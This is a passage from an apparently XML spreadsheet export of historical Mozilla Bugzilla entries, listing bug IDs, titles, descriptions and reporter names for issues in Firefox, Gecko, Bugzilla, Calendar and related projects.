and 4096 buckets IIRC).
This leads to sessions being created in clusters of buckets often sharing the
same lock (over a group of buckets).  Pallab has found an uneven distribution of
lock contention for the session table locks which he believes is due to this
clustering.
The proposed remedy is to use a multiplier when computing the hash of a session
id.  I grabbed one off a web search patch forthcoming.  Kirk has tested this on
the 3.3 branch and it seems to have a positive effect.</t>
  </si>
  <si>
    <t>CORE-214700</t>
  </si>
  <si>
    <t>move string into mozilla/xpcom</t>
  </si>
  <si>
    <t>The string &amp; libreg libraries are only used by xpcom.  For a standalone xpcom
autoconf-based build system that reuses the existing build infrastructure to
work (see reorg prototype postmortem) these directories will need to live under
the xpcom heirarchy.  To save cvs history they will need to be rsync-copied on
the cvs server.</t>
  </si>
  <si>
    <t>BUGZILLA-295456</t>
  </si>
  <si>
    <t>404 Errors include an error for /page.cgi/ too</t>
  </si>
  <si>
    <t>On the live www.bz.org site 404 errors include two errors:
404 Page Not Found
The requested URL /installation_list.html was not found on this server.
Apache/2.0.46 (Red Hat) Server at www.bugzilla.org Port 80
and
Not Found
The requested URL /page.cgi/installation_list.html.tmpl was not found on this
server.
Apache/2.0.46 (Red Hat) Server at www.bugzilla.org Port 80
However on my checkout of the site and on landfill
(http://landfill.mozilla.org/bugzilla.org/installation-list.html) - this
produces just the first error.</t>
  </si>
  <si>
    <t>CORE-374293</t>
  </si>
  <si>
    <t>Resizing text element from SVG zoom handler can cause image to disappear</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070316 Minefield/3.0a3pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070316 Minefield/3.0a3pre
Updating the attribute font-size of an SVG text element from within a zoom event handler can cause the image to disappear.
Reproducible: Always
Steps to Reproduce:
1. Place the attached test.html and test.svg in a directory.
2. Open test.html in Firefox
3. Click zoom out. 
Actual Results:  
The image disappears.
Expected Results:  
The image should be zoomed out.
In the test case the SVG is incorporated via  and the embed is dynamically re-sized to fit the zoomed image (by updating its height and width attributes to match SVGRoot.currentScale). In this scenario the image consistently disappears and never reappears until the document is reloaded.
However commenting out the dynamic resize of the embed creates another scenario where the image disappears on the first zoom out then reappears on the next zoom out then disappears again on the next zoom out and so on. There are comments in the HTML source about what to comment out.
Bizzarely adding a  just before the embed affects the behaviour of this latter scenario: the image then does not disappear.
Removing the line that re-sizes the text makes everything work.
Test case works fine in FF2.</t>
  </si>
  <si>
    <t>CORE-328906</t>
  </si>
  <si>
    <t>use nsTArray&gt; instead of nsTArray</t>
  </si>
  <si>
    <t>this way we don't have to pay attention to addrefing the font prior to adding it to the array. this will fix mac which didn't do that.</t>
  </si>
  <si>
    <t>CORE-478044</t>
  </si>
  <si>
    <t>Enable jemalloc for Windows Mobile builds</t>
  </si>
  <si>
    <t>Windows Mobile builds are using VS9 ARM compiler and the Windows Mobile 6.1 SDK</t>
  </si>
  <si>
    <t>CORE-503198</t>
  </si>
  <si>
    <t>Restore ability to trace initprop/setprop with non-branded scope and function rhs</t>
  </si>
  <si>
    <t>Regressed by me in bug 502890. See example in bug 503191.
I'm pretty sure this is safe. Stop me if you think otherwise!</t>
  </si>
  <si>
    <t>CORE-232540</t>
  </si>
  <si>
    <t>select-box with scroller set to a css-width smaller than the content of one option jump on mouseover</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040113
hi
the select-box gets a css-width via a class. There are so many otions that a
scrollbar appears.
At least one option content is more wide then the width defined in the css.
Moving the mouse over the options they will jump some steps as soon as the
mouse passes a option more wide then the css-width. This behavier is quite
confusing. See the testscript also posted here.
regards  Joachim
 .sel {
  width: 60px }
 ...
 test
 test
 test test test test test test test test test test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
 test
Reproducible: Always
Steps to Reproduce:
Just check the Testscript im Mozilla 1.6 an move your mouse over the options</t>
  </si>
  <si>
    <t>joachim.wendenburg</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-925334</t>
  </si>
  <si>
    <t>delete check for HAVE_GNU_GET_LIBC_VERSION</t>
  </si>
  <si>
    <t>This is totally unused.</t>
  </si>
  <si>
    <t>nfroyd</t>
  </si>
  <si>
    <t>CORE-537873</t>
  </si>
  <si>
    <t>Assignment to readonly properties should throw a TypeError in strict mode</t>
  </si>
  <si>
    <t>CALENDAR-269655</t>
  </si>
  <si>
    <t>Error: autocomplete controller has no properties</t>
  </si>
  <si>
    <t>When attempting to create a new event (by clicking the toolbar button) I get
the following error in the Javascript Console:
Error: Components.classes['@mozilla.org/autocomplete/controller1'] has no
properties
Source File: chrome://global/content/bindings/autocomplete.xml
Line: 52
The event gets created normally.
Sunbird 0.2b OSX</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-280555</t>
  </si>
  <si>
    <t>intersourcing.com - Ultipro eRecruitment does not support all Gecko browsers</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Accessed Ultipro eRecruiting via First Horizon Home Loans' careers website
(http://www.ftncareers.com/) by selecting Search and Apply for Open Positions.
Browser is redirected to
https://erecruitment.intersourcing.com/employer/virtualtour.asp?js=1&amp;employerID=504
which detects that Firefox is not a supported browser. The site states that it
only supports IE and Netscape.
Reproducible: Always
Steps to Reproduce:
Steps above.</t>
  </si>
  <si>
    <t>jayclark</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-319996</t>
  </si>
  <si>
    <t>amazon.com - Amazon.com phishing report page is missing some content</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20051206 SeaMonkey/1.5a
On this page there are supposed to be three text areas one under each line of text.  When I view the page with SeaMonkey I only see the text area under the line Comments:.  When I view the page with Konqueror or Safari I see all three text areas.  Even if I try spoofing my User Agent SeaMonkey still gets it wrong.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-151604</t>
  </si>
  <si>
    <t>XPCOM Glue standalone should dynamically load symbols</t>
  </si>
  <si>
    <t>The glue library should stub the public frozen functions that XPCOM provides
(see xpcom/build/nsXPCOM.h). Then glue library should dynamically load these
symbols from the XPCOM library. This will allow two important things to happen. 
First it will allow the component or application to not have to link with XPCOM
for any symbol.  In fact having to linking to any Gecko library after this
dynamic loading happens will be an immediate indication that something is wrong.  
The second important reason is targeted at the application embedder. If
the glue code does load XPCOM this same glue code can unload XPCOM and thereby
taking a big step to allow unloading gecko when it is not used. This will allow
many applications to shutdown Gecko when it is not needed and restart Gecko at will.
Patch coming up...</t>
  </si>
  <si>
    <t>FIREFOX-491810</t>
  </si>
  <si>
    <t>Geolocation cookie isn't cleared at exit for network.cookie.lifetimePolicy == 2</t>
  </si>
  <si>
    <t>Geolocation's access_token are supposed to behave like a cookie. However with network.cookie.lifetimePolicy set to 2 (clear all cookies at the end of the session) this nonetheless token persists.</t>
  </si>
  <si>
    <t>CORE-453311</t>
  </si>
  <si>
    <t>nsIProcess.exitValue is always -1 for a Non-Blocking process</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9) Gecko/2008061015 Firefox/3.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9) Gecko/2008061015 Firefox/3.0
nsIProcess spawns non block processes in a 'fire and forget' fashion. There doesn't seem to be a way of finding anything about it after it's spawned. 
nSIProcess.run() should return the pid of the process. But it returns 0 when the blocking flag is set to false. (try to run process in Non-Blocking mode)
nsIProcess.exitValue always returns -1 for a Non-Blocking process even though the process is running.
Reproducible: Always
Steps to Reproduce:
1. invoke the nsIProces.run with the blocking flag set to false
2. alert the return value.
3. Check the nsIProcess.exitValue periodically.
Actual Results:  
nsIProcess.run() returns zero and and nsIProcess.exitValue always returns -1
Expected Results:  
nsIProcess.run() should return the pid of the process and it should set the nsIProcess.exitvalue to -1 only after its terimination.</t>
  </si>
  <si>
    <t>nithinkumary2k</t>
  </si>
  <si>
    <t>SEAMONKEY-124346</t>
  </si>
  <si>
    <t>Browser crash when submitting a form</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:0.9.7) Gecko/20011221
BuildID:    Don't know (are the 0.9.8's binaries)
Very simple: when I submit a form the browser crashes.
It crashes on every form I tried to submit even on a simple form of a local HTML
file that I created to isolate the bug:
I had to reinstall 0.9.7 to get things work properly.
Reproducible: Always
Steps to Reproduce:
1. Load a page with a form
2. Submit the form (either by pressing the submit button or pressing the ENTER key)
Actual Results:  The browser crashed
Expected Results:  The browser should submit the form
System: PIII 500 128Mb
OS: WinNT4.0SP6 Workstation
I can't send back Talback information: my proxy prevent me to do this. If
there's a way to save that data and send it in some other way (mail web upload
etc.) I will be glad to do whatever I can.
I have mouse gestures (optimoz) installed.</t>
  </si>
  <si>
    <t>danilo.turina</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-118970</t>
  </si>
  <si>
    <t>Rows/cols properties of FrameSet DOM element not properly documented</t>
  </si>
  <si>
    <t>Mozilla documentation of 'rows' and 'cols' properties of the FrameSet DOM
element appear to be incorrect. Using the 'cols' property as an example:
from Mozilla 'http://www.mozilla.org/docs/dom/domref/dom_frame_ref3.html':
		cols is the number of columns in the frameset
	with the example: 
		// element in HTML: 
		fs = document.getElementById(fset)
		fs.cols = 2	// two columns of frames
from: W3C Spec
'http://www.w3.org/TR/1998/REC-html40-19980424/present/frames.html#adef-cols-FRAMESET':
		cols = multi-length-list [CN]	This attribute specifies the layout of vertical frames.
It is a comma-separated list of pixels percentages and relative length. The
default value is 100% meaning one column.
	with the example:
		The next example creates a 2x3 grid of subspaces.
		...the rest of the definition...
Manipulating the 'rows' and 'cols' properties with Javascript in NS 6.1 and 6.2
works as described in the W3C Spec not as described in the Mozilla documentation.</t>
  </si>
  <si>
    <t>ktalmon</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-166686</t>
  </si>
  <si>
    <t>nsJAR cache too frequently flushed by nsZipReaderCache::Observe()</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.0.1) Gecko/20020904
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.0.1) Gecko/20020904
The neJAR cache is a good idea and for the most part works well except the code
in nsZipReaderCache::Observe() causes some very key jar files to be dropped from
the cache and then subsequently reloaded namely in my environment
chrome/en-US.jar bounces in and out of cache maybe several times per url and
also cookie.jar. The hack/fix demonstrating Observe() is the problem simply do
RETURN at entry to Observe() and files stay cached. The intended operation of
observe real unclear to me in my environment it fires through the
mZips.Remove() loop every time it is entered.
Reproducible: Always
Steps to Reproduce:
In nsJAR.cpp in nsZipReaderCache::GetZip() following two lines debug code useful:
(see //SLE Debug)
...
  nsJAR* zip = NS_STATIC_CAST(nsJAR*
NS_STATIC_CAST(nsIZipReader*mZips.Get( // AddRefs   
  if (zip) {                                                                   
    printf(nsZipReaderCache::GetZip cache hit! %s \npath.get())  //SLE Debug
#ifdef ZIP_CACHE_HIT_RATE                                                      
    mZipCacheHits++                                                           
#endif                                                                         
    zip-&gt;ClearReleaseTime()                                                   
  }                                                                            
  else {                                                                       
    printf(nsZipReaderCache::GetZip cache miss! %s \npath.get())           
                    //SLE Debug
    zip = new nsJAR()                                                         
Actual Results:  
jar files are prematurely removed from cache
Expected Results:  
jar files should stay in cache until max count of cached files is reached</t>
  </si>
  <si>
    <t>emrick</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-16426</t>
  </si>
  <si>
    <t>Java APIs for DOM</t>
  </si>
  <si>
    <t>failed to throw runtime exceptions</t>
  </si>
  <si>
    <t>When trying to throw runtime exception from java dom native implementation
a crash occures.</t>
  </si>
  <si>
    <t>akhil.arora</t>
  </si>
  <si>
    <t>sdv</t>
  </si>
  <si>
    <t>FIREFOX-394019</t>
  </si>
  <si>
    <t>readDownloadDirPref is not a function when changing the default download directory (browser.download.dir)</t>
  </si>
  <si>
    <t>The patch for bug 308073 removed (or renamed) the function but didn't remove the reference to it at http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/browser/components/preferences/main.xul&amp;rev=1.12&amp;mark=93#90 .</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-406834</t>
  </si>
  <si>
    <t>fi / Finnish</t>
  </si>
  <si>
    <t>Use better Back/Fwd commandkeys</t>
  </si>
  <si>
    <t>Created attachment 291488
Use Ã– and Ã„ for Back/Fwd commandkeys. I'm not sure if you want this (should probably check with finnish mac people).
For a description about the problem see bug 306585. See also bug 406831 for the Swedish version. We couldn't do this in 1.8 on mac because of bug 294286.</t>
  </si>
  <si>
    <t>BUGZILLA-177430</t>
  </si>
  <si>
    <t>buglist.cgi needs a CSV output format</t>
  </si>
  <si>
    <t>buglist.cgi can already do CSV output by adding &amp;format=csv to the URL.  There
needs to be a UI on the query page for selecting this.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-332790</t>
  </si>
  <si>
    <t>b.m.o. shows inconsistent date/time</t>
  </si>
  <si>
    <t>When I'm writing this message it's Wed 5 Apr 2006 07:58:11 UTC.
Buglist (Bugs Filed Today) generated a few seconds ago says:
  Tue Apr 4 2006 23:57:57 PST
Latest bug in the list (bug 332786) says:
  Last modified: 2006-04-05 00:45:20 PST
This seems to be an issue related to the daylight saving time.</t>
  </si>
  <si>
    <t>MOZILLA_REPS-907131</t>
  </si>
  <si>
    <t>reps.mozilla.org</t>
  </si>
  <si>
    <t>MOZILLA_REPS</t>
  </si>
  <si>
    <t>Add django-cache-machine to Events model</t>
  </si>
  <si>
    <t>tasos</t>
  </si>
  <si>
    <t>giorgos</t>
  </si>
  <si>
    <t>CORE-382204</t>
  </si>
  <si>
    <t>Style contexts are not in the same style context tree with table root and style changes</t>
  </si>
  <si>
    <t>Created attachment 266325
testcase
About 50% of the time the testcase triggers:
frame: Block(div)(1) (0x27faae8) style: 0x27faa74 {}
Wrong parent style context:  style: 0x27fa074 {}
should be using:  style: 0x3f860904 {}
Style contexts are not in the same style context tree.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-480261</t>
  </si>
  <si>
    <t>Add Camino 2.0b2 to bouncer</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #470369 +++
We'll be releasing Camino 2.0b2 Friday (27 Feb) and would like it to be added to bouncer.
Camino 2.0b2 en-US will be http://releases.mozilla.org/pub/mozilla.org/camino/releases/en-US/Camino-2.0b2.dmg .
There is no multilingual version for this release.</t>
  </si>
  <si>
    <t>CORE-241981</t>
  </si>
  <si>
    <t>Anchors in Content Negotiated Documents expose underlying file extension (Content-Location)</t>
  </si>
  <si>
    <t>The url is on an Apache server with content negotiation enabled.
Visit the above page and hover or click on the links to the named anchors in the
table of contents. For example click on the Mozilla and Web Site Testing link
In Mozilla 1.7 and Trunk from 2004-04-27 on WinXp you will go to
http://bclary.com/2004/04/10/web-site-qa.xhtml#intro
In Mozilla 1.6 you will go to 
http://bclary.com/2004/04/10/web-site-qa#intro
The fact that the underlying extension is exposed makes Mozilla unusable for
content negotiation sites.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-403792</t>
  </si>
  <si>
    <t>Need OS/2 download numbers</t>
  </si>
  <si>
    <t>I originally posted this as a question in mozilla.dev.mozilla-org but as that has not received any replies I'm trying the Bugzilla route.
I'm currently the main developer for the Firefox Thunderbird SeaMonkey on OS/2. Because of that I would really like to see download numbers these three products (and possibly Sunbird and Lightning) for the OS/2 platform. This is because the OS/2 dev community is shrinking and I want to see where to best commit our/my very limited resources.
Please let me know if it is possible to get those numbers from the releases.mozilla.org logs and what more info I should provide to get them. Info about nightlies from ftp.mozilla.org would be interesting too but is secondary.</t>
  </si>
  <si>
    <t>CORE-262560</t>
  </si>
  <si>
    <t>switching alternate stylesheets &amp; table with collapsed borders model cell borders don't re-appear.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Win98 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Scenario is where HTML page has (a) table with border-collapse: collapse (b)
two alternate stylesheets one with no cell borders and the other with cell
borders.     
When switching from the alternate stylesheet with no cell borders to the
stylesheet with cell borders the table borders are not restored.
This doesn't seem to happen with every test case but where it happens it
happens consistently.  [I'll need to upload a simple test case to demonstrate.]
Reproducible: Always
Steps to Reproduce:
1.  In the test case view the page and note the cells have 2px black borders.
2.  Switch to the alternate stylesheet No Cell Border.  
    Note that the cells now have no borders.
3.  Switch back to the stylesheet Cell Border.  
    Note that the cell borders are not restored on the top table
    only on the bottom table.
Actual Results:  
The 2px cell borders were not restored on the top table.
To restore the cell borders on the top table you need to
reload the page.
Expected Results:  
When switching from stylesheet No Cell Border to stylesheet Cell Border
the 2px cell borders should be restored on the top table.</t>
  </si>
  <si>
    <t>ralphf</t>
  </si>
  <si>
    <t>NSPR-19247</t>
  </si>
  <si>
    <t>Port NSS GetNoise() function to NSPR</t>
  </si>
  <si>
    <t>NSS (crypto) requires truly random noise not pseudo random number for use in
seeding cryptographic key generation. NSS has existing function to do this
across multiple platforms see /m/src/ns/security/lib/util/*rand.c. The
algorithms for some platforms extract randomness from the low-order bits of high
resolution timers. The extant functions in NSS are tightly coupled with other
NSS algorithms.
NSS proposed moving random number seed generation from NSS to NSPR. The reasons
cited for moving it are that NSPR is the place for puting platform specific
stuff and that a source of randomness was discovered to exist on Linux the
extant Linux implementation provides no random data.
When porting the NSS random seed generation code to NSPR tight coupling with
NSS will be removed. Specifically calls to NSS functions will be removed from
the NSPR implementation. The linux implementation will be changed to use
/dev/random for extracting random noise from the underlying platform.</t>
  </si>
  <si>
    <t>CORE-258300</t>
  </si>
  <si>
    <t>Many character encoding is unselectable in setting of Default Character Encoding.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a3) Gecko/20040904
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a3) Gecko/20040904
I cannot select character encoding of language setting which I want because
scroll bar is gone.  This problem happens at both Languages of Navigator
category and Message Display of Mail &amp; Newsgroups category.  
Reproducible: Always
Steps to Reproduce:
1. Goto Mozilla-&gt;Preferences...-&gt;Navigator-&gt;Languages.
2. Select Character Encoding: -&gt; Default Character Encoding.
(in Navigator category)
Actual Results:  
Many character encoding is unselectable because scroll bar is gone.  I cannot
select character encoding of language setting which I want.
Expected Results:  
All character encoding is selectable by using scroll bar.  I can select
character encoding of language setting which I want.
On MacOSX10.2.8 I confirmed this problem on Mozilla 2004-09-05-08-trunk
build(Classic theme).  But Mozilla 2004-09-04-08-trunk didn't have this
problem.  Then I confirmed this problem on Mozillla 2004-09-05-03-trunk
build(Linux gtk2+xft).  But Mozilla 2004-09-04-03-trunk(gtk2+xft) didn't have
this problem.  It seemed that this bug occurred between 20040903 and 20040904. 
I searched CVS checkins of last three days.  Is this problem caused by bug
72747?  Or bug 252326 or bug 257920 or bug 250342?</t>
  </si>
  <si>
    <t>hub-san</t>
  </si>
  <si>
    <t>CALENDAR-369312</t>
  </si>
  <si>
    <t>Colombian Holidays file is obsolete</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 es-AR rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20061006 Sunbird/0.3
After I opened the .ics file I realized that this calendar was made for 2004. It is not valid anymore
Reproducible: Always
Steps to Reproduce:
1.Download Colombian Holidays file
2.Import ColombianHolidays.ics into Sunbird
3.Compare holiday dates
Actual Results:  
Holiday dates doesnt match
Expected Results:  
Update Colombian holidays for 2007</t>
  </si>
  <si>
    <t>davidartplus</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-185954</t>
  </si>
  <si>
    <t>Open Prefs gives Console 'Both have implementations of class PreferencePaneBase'</t>
  </si>
  <si>
    <t>Open the Console and then open the Preferences.
You get the following messages both repeated several times with various panel
names.
Build 1217.
Dec 18 09:07:11 localhost
/Applications/Chimera/Navigator.app/Contents/MacOS/Navigator: objc: Both
/Applications/Chimera/Navigator.app/Contents/PreferencePanes/Appearance.prefPane/Contents/MacOS/Appearance
and
/Applications/Chimera/Navigator.app/Contents/PreferencePanes/Navigation.prefPane/Contents/MacOS/Navigation
have implementations of class PreferencePaneBase.
Dec 18 09:07:11 localhost
/Applications/Chimera/Navigator.app/Contents/MacOS/Navigator: objc: Using
implementation from
/Applications/Chimera/Navigator.app/Contents/PreferencePanes/Navigation.prefPane/Contents/MacOS/Navigation.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-525891</t>
  </si>
  <si>
    <t>please update config-dist.php on aus2</t>
  </si>
  <si>
    <t>I just landed a patch from bug 525870 we'd like it rolled out ASAP. I moved the AUS2_PRODUCTION tag to the new revision 1.53</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-667430</t>
  </si>
  <si>
    <t>[l10n] don't use uppercase for Greek in mozilla.com template</t>
  </si>
  <si>
    <t>Uppercasing strings creates grammar difficulties for our Greek localizer since most of the font don't uppercase correctly Greek I am going to add specific css rules cancelling uppercasing for Greek only.</t>
  </si>
  <si>
    <t>CORE-513409</t>
  </si>
  <si>
    <t>GC arena allocation uses VirtualAlloc with 16 KiB allocations on x86/Win32</t>
  </si>
  <si>
    <t>On 32-bit Windows the GC arena allocation code (jsgc.cpp) uses VirtualAlloc to allocate 16 KiB buffers.  However VirtualAlloc has a 64K allocation granularity  http://blogs.msdn.com/oldnewthing/archive/2003/10/08/55239.aspx so you can only use 1/4 of your available address space for GC arenas.
I propose changing the 4 to 16 on line 1283 in jsgc.cpp: http://mxr.mozilla.org/mozilla-central/source/js/src/jsgc.cpp#1283</t>
  </si>
  <si>
    <t>caustin</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-206587</t>
  </si>
  <si>
    <t>ActiveX error cannot create control {00000000-0000-0000-0000-000000000000}</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1) Opera 7.10  [en]
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030507
Full error message is Could not create control 
{00000000-0000-0000-0000-000000000000} Check that is has been installed on your 
computer and that this page correcty references it. This error started popping 
up after a failed install of spider.ocx activex control used by the company I 
work for (it is used by the web interface for Test Director). The error comes up 
when accessing a page that uses activex (such as www.advfn.com) stops the 
browser and will not continue until you hit OK. This can happen several times 
before the page finishes loading. Makes Mozilla usable but intensly irritating. 
I've installed new versions etc with no change. i think the ActiveX config is 
broken within mozilla but don't know how to fix. Does not affect Opera or 
Explorer running on same machine. The control listed (000000) is not listed as 
being installed anywhere.
The bug is that a) the control should be removable b) ActiveX controls in 
general are not editable within the browser
Reproducible: Always
Steps to Reproduce:
1. Access test director. Spider.ocx will attempt to install
2. error spider.ocx not found. Test director will not run. This is a test 
director fault. (it only works with netscape 4 and explorer)
3. afterward activex error occurs when accessing www.advfn.com
Actual Results:  
see above
Expected Results:  
allow you to delete the broken control
can supply config files screen shots registry bits etc as required. (i'm a 
professional tester)</t>
  </si>
  <si>
    <t>euston</t>
  </si>
  <si>
    <t>CORE-349859</t>
  </si>
  <si>
    <t>groupboxes don't follow native theming</t>
  </si>
  <si>
    <t>In current [win|gnome]stripe theme groupboxes are always in a flat rounded XP Luna style while they 1) should follow WinClassic when native theming can't be picked up if bug 313388 is still the way we want to go and 2) they should follow the native theme where possible.
1) is easy to do it's just some style rules in toolkit/themes/winstripe/global/groupbox.css - I'm sure some people would be upset once again though just like they were in bug 313388
2) is probably the harder part but it's also the part I'm completely unable to look on as I don't nearly understand any of the code.</t>
  </si>
  <si>
    <t>BUGZILLA-292096</t>
  </si>
  <si>
    <t>extra Description label in some bugs of long list</t>
  </si>
  <si>
    <t xml:space="preserve">note that the behavior is somewhat random (!!) i've tried POST and GET both are
broken sometimes the first item gets two descriptions sometimes the secon.
reproducable: yes (safari camino mysql postgresql)
steps for post:
1. load
http://landfill.bugzilla.org/bugzilla-tip/buglist.cgi?query_format=advanced&amp;short_desc_type=allwordssubstr&amp;short_desc=&amp;long_desc_type=allwordssubstr&amp;long_desc=&amp;bug_file_loc_type=allwordssubstr&amp;bug_file_loc=&amp;status_whiteboard_type=allwordssubstr&amp;status_whiteboard=&amp;keywords_type=allwords&amp;keywords=&amp;emailassigned_to1=1&amp;emailtype1=substring&amp;email1=&amp;emailassigned_to2=1&amp;emailreporter2=1&amp;emailcc2=1&amp;emailtype2=substring&amp;email2=&amp;bugidtype=include&amp;bug_id=1%2C2&amp;votes=&amp;chfieldfrom=&amp;chfieldto=Now&amp;chfieldvalue=&amp;cmdtype=doit&amp;order=Reuse+same+sort+as+last+time&amp;field0-0-0=noop&amp;type0-0-0=noop&amp;value0-0-0=
2. click long list
steps for get:
1. load
http://landfill.bugzilla.org/bugzilla-tip/show_bug.cgi?id=2&amp;id=1&amp;format=multiple
expected results: no inconsistencies and no doubling.
actual results (POST):
        Opened:2000-06-15 18:07
        Description:
              Description:&lt;script 
                type=text/javascript&gt;&lt;!-- 
                  addReplyLink(0)
                //--&gt;
...
        Opened:2000-06-15 11:35
        Description:
          ------- Comment
          #1 From 
          Chris Yeh
          2000-06-15 15:30 
          -------
        </t>
  </si>
  <si>
    <t>emmanuel</t>
  </si>
  <si>
    <t>FIREFOX-337223</t>
  </si>
  <si>
    <t>Make sure moz-anno protocol is not available to web pages.</t>
  </si>
  <si>
    <t>CORE-165617</t>
  </si>
  <si>
    <t>Build warnings caused by bug 158754 checkin</t>
  </si>
  <si>
    <t>aaronl your checkin for bug 158754 has caused 57 warnings to show up. Simple to
fix add a default case to the switch.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-441739</t>
  </si>
  <si>
    <t>Remove registration barrier - allow experimental testing via alternate confirmation method.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.1.14) Gecko/20080622 Firefox/2.0.0.14
Build Identifier: 
Registration is an annoyance that I and probably many other users avoid at all costs.  There are too many accounts in too many places for it to be worth it.  Please allow an -alternate- method for verifying a user wants to try an experimental add-on.
Suggestion: Allow some way for the user to enter the exact add-on name and version as on the title of the experimental add as confirmation that they are in fact installing something experimental.  DO NOT require a valid account of any kind for this method.
Reason: There is surely a non-zero percentage of potential testers who would want to try add-ons and leave 'it works well enough' comments only if they actually like the software or just remove it and leave entirely since the rest of the public add-ons meet their needs besides the potentially not yet useful add-on they just tried.   Testing unproven add-ons for a majority of users is likely a rare thing.  The entry barrier forced by registration and yet another account will surely stop some users who just want to test one add-on that happens to offer a minor improvement they can otherwise live without.
Reproducible: Always
Steps to Reproduce:
- Security policy that does not consider casual testers. -</t>
  </si>
  <si>
    <t>ketsueki.shard</t>
  </si>
  <si>
    <t>SEAMONKEY-459564</t>
  </si>
  <si>
    <t>Decide what to do with the outset-top-bottom CSS class</t>
  </si>
  <si>
    <t>Bug 459457 removes support for outset-top-bottom which is used only once in /suite/common/search/search-panel.xul. I suggest you do something about it in /suite/themes/*/communicator/search/search.css.</t>
  </si>
  <si>
    <t>CORE-273182</t>
  </si>
  <si>
    <t>appversion appname and platform overrides should not apply to chrome</t>
  </si>
  <si>
    <t>The three general.*.override prefs used to trick websites into believing you are
using (usually) Internet Explorer should not apply to chrome JS contexts.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-201450</t>
  </si>
  <si>
    <t>Crash when java attempts to read cookies</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030409
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030409
Attempting to load this page which has a Java applet which loads and stores
cookies breaks under 1.4a and under the latest daily build it worked under
1.3final.  Trace from the java console follows as attachment.  I don't know of
any other java-using sites that load/store cookies.
Reproducible: Always
Steps to Reproduce:
1.  Make sure the latest Java plugins are installed
2.  Go to www.popcap.com
3.  Click on the play now button for the Insaniquarium game
Actual Results:  
Java loads normally if it is not already loaded and then the browser freezes.
 The java console displays those messages and then mozilla crashes.
Expected Results:  
Played the game properly.</t>
  </si>
  <si>
    <t>ziz</t>
  </si>
  <si>
    <t>CORE-232581</t>
  </si>
  <si>
    <t>clicking on links in floats directly inside table causes window to spontaneously scroll up</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20040115 Epiphany/1.0.6
The is best described by going to the listed page scrolling down to the bottom
of the page and clicking on one of the bottom Ch. # links below the graphs. I
am seeing the browser scroll up to a fixed point higher up the page for no
apparent reason in Mozilla Firebird and GNOME Epiphany on both Windows and Linux.
Reproducible: Always
Steps to Reproduce:
1. scroll to bottom of page
2. click on Ch. # link
3.
Actual Results:  
Browser scrolls up for no reason.
Expected Results:  
Gone to link location.</t>
  </si>
  <si>
    <t>unit3</t>
  </si>
  <si>
